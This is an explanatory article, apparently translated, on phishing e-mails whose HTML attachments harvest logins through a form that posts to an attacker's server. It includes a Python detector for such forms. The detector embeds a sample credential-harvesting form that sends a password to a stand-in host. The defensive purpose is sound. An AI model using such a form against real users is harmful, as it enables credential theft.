Instead of URLs, phishing emails now use 'HTML attachments'.

Looking at recent phishing e-mail trends in South Korea, attacks masquerading as the issuing of quotes and invoices are becoming more common. At the same time they are becoming more elaborate, reusing the body of a stolen e-mail, the name of the person in charge, the subject line, and even a sending account acquired from other networks. Such an e-mail either connects to a phishing site through a URL or a hyperlink inserted in an image and requests user account information, or attaches an HTML document whose file name is disguised as 'quote' or 'invoice'. If the technique becomes more popular, it deserves special consideration.

HTML documents are used in a variety of e-mailed bills, including card balances and carrier fee information. Since the document can be programmed to communicate with a server over the Internet, security-related features such as user verification (identification by date of birth, etc.) can be implemented.

Cyber criminals benefit from this ability to communicate over the Internet. The details entered by the user in the document can be sent to the server designated by the attacker without leading the user to a separate phishing site.

It is also possible to deceive users convincingly, for example, by using a file name like 'quote' and asking for an ID and password for 'security'.

Even for the same phishing threat, using HTML documents rather than URLs has benefits for the attacker. A phishing site begins with a cyber attacker building a fake site that appears to be identical to the original. If we click on the URL provided in the document, we are led to that website, and the phishing site's address appears intact in the web browser.

In this form of phishing, an attacker takes over a poorly maintained website and then creates his own phishing page on it without the administrator's knowledge. A savvy person will spot a phishing site by seeing an address slightly different from the one they are familiar with. A clever attacker using the 'typosquatting' technique will directly register an Internet address that is close to the original one. If the attack persists, anti-virus software may mark the URL as a malicious site and alert the user when they try to visit it. In conclusion, URL-based phishing attempts are easy to see and are likely to be blocked.

Phishing through HTML documents, on the other hand, is also carried out in a web browser, but the file path (the folder on the PC where the HTML document is stored) appears in the address bar rather than a URL. As a result, the user cannot tell that it is phishing only by looking at the address, and security tools such as anti-virus software cannot identify the file. Most users believe that because the file is kept locally (such as on the C drive), it would not be able to connect to the Internet.

However, a closer examination of the HTML code reveals that it is set up to deliver the user's form data (ID/password, etc.) to the URL defined by the attacker. To begin with, the [form action="Internet address"] code is a tag that determines the server address to which the data is sent when the form is submitted. The [method="post"] code defines the method of transmitting the data. When the two are combined as [form action="Internet address" method="post"], the form data is transmitted to the server previously designated by the attacker. It is no exaggeration to say that this is all the coding there is.
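The check below is an added example, not code from the original article: it parses an HTML attachment and reports every form whose action is a remote http(s) address, which is the pattern described above. The sample attachment and the host collector.example are constructed, and the check covers only static form tags, not submission driven by JavaScript.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment; collector.example is a placeholder host.
SAMPLE = """<html><body><h3>Quote - sign in to view</h3>
<form action="https://collector.example/save.php" method="POST">
  <input type="text" name="id">
  <input type="password" name="pw" />
  <input type="submit" value="View">
</form></body></html>"""


class FormAudit(HTMLParser):
    """Collect every <form> with its action, method and input types."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.forms = []
        self._current = None  # form currently open, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", "").strip(),
                             "method": a.get("method", "get").lower(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a.get("type", "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_attachment(html_text):
    """Return one finding per form that sends its data to a remote server."""
    parser = FormAudit()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        url = urlparse(form["action"])
        if url.scheme in ("http", "https") and url.netloc:
            findings.append({"host": url.hostname,
                             "method": form["method"],
                             "asks_password": "password" in form["inputs"]})
    return findings


if __name__ == "__main__":
    print(audit_attachment(SAMPLE))
```

A finding with asks_password set on a file that arrived as a 'quote' or 'invoice' attachment is a strong reason to quarantine the message before a user opens it.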

In other words, if the user enters information here, the attacker receives it in its entirety. In reality, the attacker hacks a shopping mall site for sterilization goods in another country, then sets up his own file storage space on the server and records the victim's ID/password there. The attacker may use the information gathered in this way to carry out a 'credential stuffing' attack, which tries to gain direct access to the corporate groupware service or log in to another service.

Since the data is not recorded in the web browser cache (temporary storage file) when it is sent in this manner, it is impossible to ascertain during a follow-up investigation by which route the account information was leaked. Above all, although these phishing files can be created after a single day of web design training, the scope and threat of such attacks is very wide.

It’s sure to be phishing even though you don’t have the keys. Details can be leaked in a variety of ways depending on how the code is written, and in some situations, not just HTML but also JavaScript is used. As a result, in order to protect against phishing emails, users should avoid opening unwanted attachments or clicking unfamiliar URLs. Additionally, you can check the sender's name and e-mail address, as well as the contents and signature of the e-mail, to weed out suspicious e-mails.